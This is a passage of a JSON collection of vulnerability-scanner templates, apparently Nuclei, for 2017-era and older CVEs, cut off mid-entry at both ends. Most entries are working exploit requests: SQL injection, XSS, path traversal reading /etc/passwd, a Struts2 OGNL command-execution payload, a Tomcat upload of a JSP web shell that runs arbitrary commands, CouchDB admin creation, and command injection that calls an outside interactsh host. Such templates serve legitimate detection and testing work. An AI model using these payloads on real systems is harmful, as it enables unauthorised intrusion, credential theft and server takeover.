Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/DnnImageHandler.ashx?mode=file&url=http://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2017-5689","info":{"name":"Intel Active Management - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","GET /hw-sys.htm HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"digest-username":"admin","matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["System Status","Active Management Technology"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-7391","info":{"name":"Magmi 0.7.22 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/magmi/web/ajax_gettime.php?prefix=%22%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3C"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain);</script><"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-8917","info":{"name":"Joomla! <3.7.1 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,md5({{num}})),1)"],"matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]}]}]},{"id":"CVE-2017-7925","info":{"name":"Dahua Security - Configuration File Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/current_config/passwd"],"matchers":[{"type":"dsl","dsl":["contains(to_lower(body), \"ugm\")","contains(to_lower(body), \"id:name:passwd\")","status_code == 200"],"condition":"and"}],"extractors":[{"type":"regex","group":1,"regex":["1:(.*:.*):1:CtrPanel"]}]}]},{"id":"CVE-2017-16894","info":{"name":"Laravel <5.5.21 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/.env"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["APP_NAME=","APP_DEBUG=","DB_PASSWORD="],"condition":"and"},{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-17059","info":{"name":"WordPress amtyThumb Posts 8.1.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-content/plugins/amty-thumb-recent-post/amtyThumbPostsAdminPg.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E=1"],"body":"amty_hidden=1","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-6090","info":{"name":"PhpColl 2.5.1 Arbitrary File Upload","severity":"high"},"requests":[{"raw":["POST /clients/editclient.php?id={{randstr}}&action=update HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------154934846911423734231554128137\n\n-----------------------------154934846911423734231554128137\nContent-Disposition: form-data; name=\"upload\"; filename=\"{{randstr}}.php\"\nContent-Type: application/x-php\n\n<?php echo md5('phpcollab_rce');?>\n\n-----------------------------154934846911423734231554128137--\n","GET /logos_clients/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["48dbd2384cb6b996fa1e2855c7f0567f"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-14186","info":{"name":"FortiGate FortiOS SSL VPN Web Portal - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/remote/loginredir?redir=javascript:alert(document.domain)"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["location=decodeURIComponent(\"javascript%3Aalert%28document.domain%29\""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18536","info":{"name":"WordPress Stop User Enumeration <=1.3.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?author=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-17736","info":{"name":"Kentico - Installer Privilege Escalation","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/CMSInstall/install.aspx"],"matchers-condition":"or","matchers":[{"type":"word","words":["Kentico","Database Setup","SQLServer"],"condition":"and"},{"type":"word","words":["Database Setup","SQLServer"],"condition":"and"}]}]},{"id":"CVE-2017-17731","info":{"name":"DedeCMS 5.7 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\\%27%20or%20mid=@`\\%27`%20/*!50000union*//*!50000select*/1,2,3,md5({{num}}),5,6,7,8,9%23@`\\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-7269","info":{"name":"Windows Server 2003 & IIS 6.0 - Remote Code Execution","severity":"critical"},"requests":[{"method":"OPTIONS","path":["{{BaseURL}}"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["regex(\"<DAV:sql>\", dasl)","regex(\"[\\d]+(,\\s+[\\d]+)?\", dav)","regex(\".*?PROPFIND\", public)","regex(\".*?PROPFIND\", allow)"],"condition":"or"},{"type":"word","part":"header","words":["IIS/6.0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-14849","info":{"name":"Node.js <8.6.0 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/static/../../../a/../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-10075","info":{"name":"Oracle Content Server - Cross-Site Scripting","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=XXXXXXXXXXXX<svg/onload=alert(document.domain)>&dSecurityGroup=&QueryText=(dInDate+>=+%60<$dateCurrent(-7)$>%60)&PageTitle=OO","{{BaseURL}}/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=AAA&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=XXXXXXXXXXXX<svg/onload=alert(document.domain)>"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(document.domain)>","ORACLE_QUERY"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-3506","info":{"name":"Oracle Fusion Middleware Weblogic Server - Remote OS Command Execution","severity":"high"},"requests":[{"raw":["POST /wls-wsat/RegistrationRequesterPortType HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8,\nContent-Type: text/xml;charset=UTF-8\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n  <soapenv:Header>\n    <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\n      <java version=\"1.8\" class=\"java.beans.XMLDecoder\">\n        <void id=\"url\" class=\"java.net.URL\">\n          <string>http://{{interactsh-url}}</string>\n        </void>\n        <void idref=\"url\">\n          <void id=\"stream\" method =\"openStream\"/>\n        </void>\n      </java>\n    </work:WorkContext>\n    </soapenv:Header>\n  <soapenv:Body/>\n</soapenv:Envelope>\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2017-12629","info":{"name":"Apache Solr <= 7.1 - XML Entity Injection","severity":"critical"},"requests":[{"raw":["GET /solr/admin/cores?wt=json HTTP/1.1\nHost: {{Hostname}}\n","GET /solr/{{core}}/select?q=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%0A%3C!DOCTYPE%20root%20%5B%0A%3C!ENTITY%20%25%20remote%20SYSTEM%20%22https%3A%2F%2F{{interactsh-url}}%2F%22%3E%0A%25remote%3B%5D%3E%0A%3Croot%2F%3E&wt=xml&defType=xmlparser HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}],"extractors":[{"type":"regex","name":"core","group":1,"regex":["\"name\"\\:\"(.*?)\""],"internal":true}]}]},{"id":"CVE-2017-15287","info":{"name":"Dreambox WebControl 2.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /webadmin/pkg?command=<script>alert(document.cookie)</script> HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers":[{"type":"word","words":["Unknown command: <script>alert(document.cookie)</script>"]}]}]},{"id":"CVE-2017-1000163","info":{"name":"Phoenix Framework - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?redirect=/\\interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_]*\\.)?interact\\.sh(?:\\s*?)$"]}]}]},{"id":"CVE-2017-12615","info":{"name":"Apache Tomcat Servers - Remote Code Execution","severity":"high"},"requests":[{"method":"PUT","path":["{{BaseURL}}/poc.jsp/"],"body":"<%@ page import=\"java.util.*,java.io.*\"%>\n<%\nif (request.getParameter(\"cmd\") != null) {\n        out.println(\"Command: \" + request.getParameter(\"cmd\") + \"<BR>\");\n        Process p = Runtime.getRuntime().exec(request.getParameter(\"cmd\"));\n        OutputStream os = p.getOutputStream();\n        InputStream in = p.getInputStream();\n        DataInputStream dis = new DataInputStream(in);\n        String disr = dis.readLine();\n        while ( disr != null ) {\n                out.println(disr);\n                disr = dis.readLine();\n                }\n        }\n%>\n","headers":{"Content-Type":"application/x-www-form-urlencoded"}},{"method":"GET","path":["{{BaseURL}}/poc.jsp?cmd=cat+%2Fetc%2Fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-9140","info":{"name":"Reflected XSS - Telerik Reporting Module","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Telerik.ReportViewer.axd?optype=Parameters&bgColor=_000000%22onload=%22prompt(1)"],"matchers-condition":"and","matchers":[{"type":"word","words":["#000000\"onload=\"prompt(1)","Telerik.ReportViewer.axd?name=Resources"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-17043","info":{"name":"WordPress Emag Marketplace Connector 1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php?post=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-1000028","info":{"name":"Oracle GlassFish Server Open Source Edition 4.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd","{{BaseURL}}/theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["regex('root:.*:0:0:', body)","status_code == 200"],"condition":"and"},{"type":"dsl","dsl":["contains(body, 'bit app support')","contains(body, 'fonts')","contains(body, 'extensions')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2017-15647","info":{"name":"FiberHome Routers - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/webproc?getpage=/etc/passwd&var:language=en_us&var:page=wizardfifth"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18638","info":{"name":"Graphite <=1.1.5 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/composer/send_email?to={{rand_text_alpha(4)}}@{{rand_text_alpha(4)}}&url=http://{{interactsh-url}}"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2017-12635","info":{"name":"Apache CouchDB 1.7.0 / 2.x < 2.1.1 - Remote Privilege Escalation","severity":"critical"},"requests":[{"raw":["PUT /_users/org.couchdb.user:poc HTTP/1.1\nHost:  {{Hostname}}\nAccept: application/json\n\n{\n  \"type\": \"user\",\n  \"name\": \"poc\",\n  \"roles\": [\"_admin\"],\n  \"roles\": [],\n  \"password\": \"123456\"\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json","Location:"]},{"type":"word","part":"body","words":["org.couchdb.user:poc","conflict","Document update conflict"]},{"type":"status","status":[201,409]}]}]},{"id":"CVE-2017-12544","info":{"name":"HPE System Management - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/gsearch.php.en?prod=';prompt`document.domain`;//"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var prodName = '';prompt`document.domain`;//';"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-9288","info":{"name":"WordPress Raygun4WP <=1.8.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/raygun4wp/sendtesterror.php?backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-10974","info":{"name":"Yaws 1.91 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/%5C../ssl/yaws-key.pem"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["!contains(tolower(body), \"<html\")"]},{"type":"word","words":["BEGIN RSA PRIVATE KEY"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-15715","info":{"name":"Apache httpd <=2.4.29 - Arbitrary File Upload","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryKc8fBVDo558U4hbJ\n\n------WebKitFormBoundaryKc8fBVDo558U4hbJ\nContent-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}.php\"\n\n{{randstr_1}}\n\n------WebKitFormBoundaryKc8fBVDo558U4hbJ\nContent-Disposition: form-data; name=\"name\"\n\n{{randstr}}.php\\x0A\n------WebKitFormBoundaryKc8fBVDo558U4hbJ--\n","GET /{{randstr}}.php\\x0A HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip,deflate\nAccept: */*\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(body_2, \"{{randstr_1}}\")"]}]}]},{"id":"CVE-2017-11610","info":{"name":"XML-RPC Server - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /RPC2 HTTP/1.1\nHost: {{Hostname}}\nAccept: text/xml\nContent-type: text/xml\n\n<methodCall>\n  <methodName>supervisor.supervisord.options.warnings.linecache.os.system</methodName>\n  <params>\n    <param>\n      <string>nslookup {{interactsh-url}}</string>\n    </param>\n  </params>\n</methodCall>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"header","words":["text/xml"]},{"type":"word","part":"body","words":["<methodResponse>","<int>"],"condition":"and"}]}]},{"id":"CVE-2017-12611","info":{"name":"Apache Struts2 S2-053 - Remote Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/?name=%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27cat%20/etc/passwd%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27/c%27%2C%23cmd%7D%3A%7B%27/bin/bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%40org.apache.commons.io.IOUtils%40toString%28%23process.getInputStream%28%29%29%29%7D"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-9791","info":{"name":"Apache Struts2 S2-053 - Remote Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/integration/saveGangster.action"],"body":"name=%25%7b%28%23%64%6d%3d%40%6f%67%6e%6c%2e%4f%67%6e%6c%43%6f%6e%74%65%78%74%40%44%45%46%41%55%4c%54%5f%4d%45%4d%42%45%52%5f%41%43%43%45%53%53%29%2e%28%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%3f%28%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%3d%23%64%6d%29%3a%28%28%23%63%6f%6e%74%61%69%6e%65%72%3d%23%63%6f%6e%74%65%78%74%5b%27%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%41%63%74%69%6f%6e%43%6f%6e%74%65%78%74%2e%63%6f%6e%74%61%69%6e%65%72%27%5d%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%3d%23%63%6f%6e%74%61%69%6e%65%72%2e%67%65%74%49%6e%73%74%61%6e%63%65%28%40%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%6f%67%6e%6c%2e%4f%67%6e%6c%55%74%69%6c%40%63%6c%61%73%73%29%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%2e%67%65%74%45%78%63%6c%75%64%65%64%50%61%63%6b%61%67%65%4e%61%6d%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%2e%67%65%74%45%78%63%6c%75%64%65%64%43%6c%61%73%73%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%63%6f%6e%74%65%78%74%2e%73%65%74%4d%65%6d%62%65%72%41%63%63%65%73%73%28%23%64%6d%29%29%29%29%2e%28%23%71%3d%28{{num1}}%2a{{num2}}%29%29%2e%28%23%71%29%7d&age=10&__checkbox_bustedBefore=true&description=\n","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{result}}","added successfully"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-12617","info":{"name":"Apache Tomcat - Remote Code Execution","severity":"high"},"requests":[{"raw":["PUT /{{randstr}}.jsp/ HTTP/1.1\nHost: {{Hostname}}\n\n<% out.println(\"CVE-2017-12617\");%>\n","GET /{{randstr}}.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["CVE-2017-12617"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-12138","info":{"name":"XOOPS Core 2.5.8 - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /user.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuname={{username}}&pass={{password}}&xoops_redirect=%2Findex.php&op=login\n","GET /modules/profile/index.php?op=main&xoops_redirect=https:www.interact.sh HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2017-12637","info":{"name":"SAP NetWeaver Application Server Java 7.5 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS?/.."],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["WEB-INF","META-INF"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-9833","info":{"name":"BOA Web Server 0.94.14 - Arbitrary File Access","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/passwd%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-12149","info":{"name":"Jboss Application Server - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /invoker/JMXInvokerServlet/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/octet-stream\n\n{{ base64_decode(\"rO0ABXNyABNqYXZhLnV0aWwuQXJyYXlMaXN0eIHSHZnHYZ0DAAFJAARzaXpleHAAAAACdwQAAAACdAAJZWxlbWVudCAxdAAJZWxlbWVudCAyeA==\") }}\n","POST /invoker/EJBInvokerServlet/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/octet-stream\n\n{{ base64_decode(\"rO0ABXNyABNqYXZhLnV0aWwuQXJyYXlMaXN0eIHSHZnHYZ0DAAFJAARzaXpleHAAAAACdwQAAAACdAAJZWxlbWVudCAxdAAJZWxlbWVudCAyeA==\") }}\n","POST /invoker/readonly HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/octet-stream\n\n{{ base64_decode(\"rO0ABXNyABNqYXZhLnV0aWwuQXJyYXlMaXN0eIHSHZnHYZ0DAAFJAARzaXpleHAAAAACdwQAAAACdAAJZWxlbWVudCAxdAAJZWxlbWVudCAyeA==\") }}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["ClassCastException"]},{"type":"status","status":[200,500]}]}]},{"id":"CVE-2017-12794","info":{"name":"Django Debug Page - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/create_user/?username=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-14135","info":{"name":"OpenDreambox 2.0.0 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /webadmin/script?command=|%20nslookup%20{{interactsh-url}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["/bin/sh","/usr/script"],"condition":"and"},{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-5521","info":{"name":"NETGEAR Routers - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/passwordrecovered.cgi?id={{rand_base(5)}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["right\">Router\\s*Admin\\s*Username<","right\">Router\\s*Admin\\s*Password<"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-9416","info":{"name":"Odoo 8.0/9.0/10.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/base_import/static/c:/windows/win.ini","{{BaseURL}}/base_import/static/etc/passwd"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["regex('root:.*:0:0:', body)","status_code == 200"],"condition":"and"},{"type":"dsl","dsl":["contains(body, 'bit app support')","contains(body, 'fonts')","contains(body, 'extensions')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2017-16806","info":{"name":"Ulterius Server < 1.9.5.0 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/.../.../.../.../.../.../.../.../.../windows/win.ini","{{BaseURL}}/.../.../.../.../.../.../.../.../.../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","\\[(font|extension|file)s\\]"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2006-1681","info":{"name":"Cherokee HTTPD <=0.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/%2F..%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2006-2842","info":{"name":"Squirrelmail <=1.4.6 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/src/redirect.php?plugins[]=../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-4804","info":{"name":"Joomla! Component com_kp - 'Controller' Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_kp&controller=../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-1669","info":{"name":"WP Custom Pages 0.5.0.1 - Local File Inclusion (LFI)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wp-custom-pages/wp-download.php?url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-0049","info":{"name":"Majordomo2 - SMTP/HTTP Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/mj_wwwusr?passw=&list=GLOBAL&user=&func=help&extra=/../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-5265","info":{"name":"Featurific For WordPress 1.6.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/featurific-for-wordpress/cached_image.php?snum=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-4926","info":{"name":"Adminimize 1.7.22 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/adminimize/adminimize_page.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-4618","info":{"name":"Advanced Text Widget < 2.0.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/advanced-text-widget/readme.txt HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/advanced-text-widget/advancedtext.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, 